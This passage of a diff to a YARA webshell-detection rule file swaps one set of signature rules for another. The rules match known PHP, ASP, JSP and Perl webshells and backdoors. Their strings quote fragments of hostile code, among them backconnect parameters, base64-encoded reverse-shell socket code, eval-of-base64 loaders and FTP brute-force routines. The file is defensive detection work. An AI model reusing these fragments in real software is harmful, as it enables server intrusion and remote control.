+		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
+		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
 
 	strings:
-		$s0 = "Emperor Hacking TEAM"
-		$s1 = "Simshell" fullword
-		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
-		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
+		$s0 = "if(eregi(\"./shbd $por\",$scan))"
+		$s1 = "$_POST['backconnectip']"
+		$s2 = "$_POST['backcconnmsg']"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Asmodeus_V0_1_Pl
+rule SIGNATURE_BASE__R577_Php_Php_R57_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cfd082a8-56fa-54bc-a683-c0052f78e12e"
+		id = "093892f6-ff53-5bd1-b7b2-fea21a9258aa"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4201-L4214"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5222-L5239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0978b672db0657103c79505df69cb4bb"
-		logic_hash = "be0130c9d2a5d29e6ef8749b0058c96c2ca1ecb9823fd14a8a2c82978cf3d104"
+		logic_hash = "afbd2103b0c953d6aec070ba450f43e567560bc9743423a5731cd4d6e5e36bb6"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "8023394542cddf8aee5dec6072ed02b5"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$s0 = "[url=http://www.governmentsecurity.org"
-		$s1 = "perl asmodeus.pl client 6666 127.0.0.1"
-		$s2 = "print \"Asmodeus Perl Remote Shell"
-		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
+		$s1 = "if(rmdir($_POST['mk_name']))"
+		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
+		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Backup_Php_Often_With_C99Shell
+rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_Sses_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file backup.php.php.txt"
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		id = "81480945-b684-50b6-9431-4ab7a786b214"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4215-L4227"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5240-L5256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aeee3bae226ad57baf4be8745c3f6094"
-		logic_hash = "e27d00ebfbac2565568b9a97552a331db91b4e9aa318febb048937f5c3a1a1ba"
+		logic_hash = "9bbcb687c83c01ad52e8978a60e604a74f10c33a63af3b91d0286b30dea42890"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s0 = "#phpMyAdmin MySQL-Dump" fullword
-		$s2 = ";db_connect();header('Content-Type: application/octetstr"
-		$s4 = "$data .= \"#Database: $database" fullword
+		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
+		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
+		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Reader_Asp
+rule SIGNATURE_BASE_Multiple_Php_Webshells
 {
 	meta:
-		description = "Semi-Auto-generated  - file Reader.asp.txt"
+		description = "Semi-Auto-generated  - from files multiple_php_webshells"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "70094d24-fa3a-503c-b9b6-294a883fc52c"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4228-L4240"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5258-L5279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ad1a362e0a24c4475335e3e891a01731"
-		logic_hash = "ec0dc3b050d84e852e0c18bd00961f109d3506fa7f2e8656448bd5edd28d9305"
+		logic_hash = "d55c96febd64107273001edadbda6d0a1b4b00e35fb41b46561b49fca6a9bd1b"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "be0f67f3e995517d18859ed57b4b4389"
+		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash4 = "8023394542cddf8aee5dec6072ed02b5"
+		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash6 = "817671e1bdc85e04cc3440bbd9288800"
+		hash7 = "7101fe72421402029e2629f3aaed6de7"
+		hash8 = "f618f41f7ebeb5e5076986a66593afd1"
 
 	strings:
-		$s1 = "Mehdi & HolyDemon"
-		$s2 = "www.infilak."
-		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
+		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Phpshell17_Php
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file phpshell17.php.txt"
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ea1f657c-2023-50bb-a2ee-33c53ee8fb5e"
+		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4241-L4253"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5280-L5295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9a928d741d12ea08a624ee9ed5a8c39d"
-		logic_hash = "a9306747a5c9756f393c61562ed4a601c75c3a9491ad19a7b7dbae1fbd505e9a"
+		logic_hash = "c089f8175532ddc0e2d256b4972f7db32683bd213a456622ed27ab4844d1e435"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
 
 	strings:
-		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
-		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
-		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
+		$s0 = "<b>Dumped! Dump has been writed to "
+		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
+		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Myshell_Php_Php
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file myshell.php.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4254-L4266"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5296-L5313"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "62783d1db52d05b1b6ae2403a7044490"
-		logic_hash = "dd7b0fa637a8317986de0c2312b4b552f1110fb5a64590a9a21c854e5985fbb6"
+		logic_hash = "e82882e89a1aeb256768f2af7a6d3674c89f9abc358710b33b8d3d425defcef1"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
 
 	strings:
-		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
-		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
-		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
+		$s0 = "@ini_set(\"highlight" fullword
+		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
+		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Simshell_1_0___Simorgh_Security_MGZ_Php
+rule SIGNATURE_BASE__GFS_Web_Shell_Ver_3_1_7___Priv8_Php_Nshell_Php_Php_Gfs_Sh_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
+		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "51565555-a17b-59c7-b433-c3166fe0d7f0"
+		id = "4d1dd87b-1ffd-564d-9411-c5d2fc01ae0f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4267-L4280"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5314-L5329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
-		logic_hash = "590a1572877fafcd4425a04c12cd56194f03a63b7acad93c39d4b16dc5a1902d"
+		logic_hash = "9df5b6df25574b303044a0799c5eb5f38f9ebfbc6f6114275fe1e34adbde1f7c"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "be0f67f3e995517d18859ed57b4b4389"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
 
 	strings:
-		$s0 = "Simorgh Security Magazine "
-		$s1 = "Simshell.css"
-		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
-		$s3 = "www.simorgh-ev.com"
+		$s2 = "echo $uname.\"</font><br><b>\";" fullword
+		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
+		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Jspshall_Jsp
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4bccad33-d26e-52c2-b7f8-802f2c8f3889"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4281-L4293"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5330-L5348"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
-		logic_hash = "94c458d3f38ba21348b0202e2b81bbbc3859e97d64f101a9ea7ec6f036e38bc5"
+		logic_hash = "0f44dc1ff243b234a718e8dbd5cc8c4dc8eb9d3b63300a5c6ff72b86280607bf"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s0 = "kj021320"
-		$s1 = "case 'T':systemTools(out);break;"
-		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
+		$s0 = "c99ftpbrutecheck"
+		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
+		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword
+		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Php
+rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file webshell.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4294-L4305"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5349-L5365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e425241b928e992bde43dd65180a4894"
-		logic_hash = "7b0f4f4afde7dcb44c9d877a72c961f3666278ce28a24ae8068cfbc32639e307"
+		logic_hash = "e9cd7425b806f71d8889f5df7f3fc2f4a692279fc4e495104646cfe28c5b5fe5"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
-		$s3 = "PHP Web Shell"
+		$s0 = "$sqlquicklaunch[] = array(\""
+		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Rootshell_Php
+rule SIGNATURE_BASE__Antichat_Php_Php_Fatalshell_Php_Php_A_Gedit_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file rootshell.php.txt"
+		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "aec6621e-f23a-5f9f-91f1-d2f1b1ab58d0"
+		id = "6bf5640f-0773-5d93-8d27-0844062017c7"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4306-L4319"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5366-L5382"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "265f3319075536030e59ba2f9ef3eac6"
-		logic_hash = "f836dd1825dc84212d32a034c0dde45d60ccd1eb667018abb60d671b61192666"
+		logic_hash = "789340845aeed4accaef02afa1a1fe420e73b6f5af1b621f4ec2342994045278"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
+		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
+		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
 
 	strings:
-		$s0 = "shells.dl.am"
-		$s1 = "This server has been infected by $owner"
-		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
-		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
+		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
+		$s1 = "if($action==\"phpeval\"){" fullword
+		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
+		$s3 = "$dir=getcwd().\"/\";" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Connectback2_Pl
+rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_Sses_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file connectback2.pl.txt"
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4ddebc62-17d2-577e-84bd-207367078327"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4320-L4332"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5383-L5396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "473b7d226ea6ebaacc24504bd740822e"
-		logic_hash = "7316c93f12dbbf6d0235601d8be88c199e37955507925222d00041d0ceaf01c7"
+		logic_hash = "b2bdf4187ff3d63e4af5c70e8cc93cd8fac3257b33c38764ad2bb2e206066162"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
 
 	strings:
-		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
-		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
-		$s2 = "ConnectBack Backdoor"
+		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Defacekeeper_0_2_Php
+rule SIGNATURE_BASE__Crystal_Php_Nshell_Php_Php_Load_Shell_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
+		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "671323e2-42cb-5ce0-9839-5d01c446471c"
+		id = "a92134cd-7f10-589f-bcda-508bc7a20efe"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4333-L4345"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5397-L5412"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "713c54c3da3031bc614a8a55dccd7e7f"
-		logic_hash = "0ee3fed3441e9561867508e324d7a6b1808a8923513bf1c9b82f8238224c994c"
+		logic_hash = "71a9310b19b66e3699f75f551cc604f535ea843eb9c50f4a009edcd9c11e01b9"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "0c5d227f4aa76785e4760cdcff78a661"
 
 	strings:
-		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
-		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
-		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s1 = "$dires = $dires . $directory;" fullword
+		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Shells_PHP_Wso
+rule SIGNATURE_BASE__Nst_Php_Php_Cybershell_Php_Php_Img_Php_Php_Nstview_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file wso.txt"
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "fdce6094-a88e-5da6-aeb0-bc97b15bf397"
+		id = "cc4dc0e9-dbb1-560b-ae36-23d3e16a407f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4346-L4357"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5413-L5429"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "33e2891c13b78328da9062fbfcf898b6"
-		logic_hash = "31ef69228b66b30300006f63b1e4d6e92c2512caca4bd915d418b48564b39c47"
+		logic_hash = "afc0b1c83644aa323d308471e5978b6b03f444f5f46fbaddac28ff42d524df1e"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "ef8828e0bc0641a655de3932199c0527"
+		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash3 = "4745d510fed4378e4b1730f56f25e569"
 
 	strings:
-		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
-		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
+		$s0 = "@$rto=$_POST['rto'];" fullword
+		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
+		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Backdoor1_Php
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Dc3_Security_Crew_Shell_Priv_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file backdoor1.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "89f44a1c-8a42-58f6-9308-371f4e652bff"
+		id = "d22c4cc3-842b-5a24-bf4b-a8024b447b9e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4358-L4370"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5430-L5446"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e1adda1f866367f52de001257b4d6c98"
-		logic_hash = "7c8840dc91c16b9fa19fee16e0159a7f13db23c96596e18da0cdab07931ce35b"
+		logic_hash = "7a4c74912caa1855efc3a2ea7fa6d0082f62776d77a211e59f12892d4883f240"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "433706fdc539238803fd47c4394b5109"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
-		$s2 = "class backdoor {"
-		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
+		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
+		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Elmaliseker_Asp
+rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_1_C2007_Php_Php_C100_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "7ecf3d5c-be91-579e-905b-5f2ad03a0e42"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
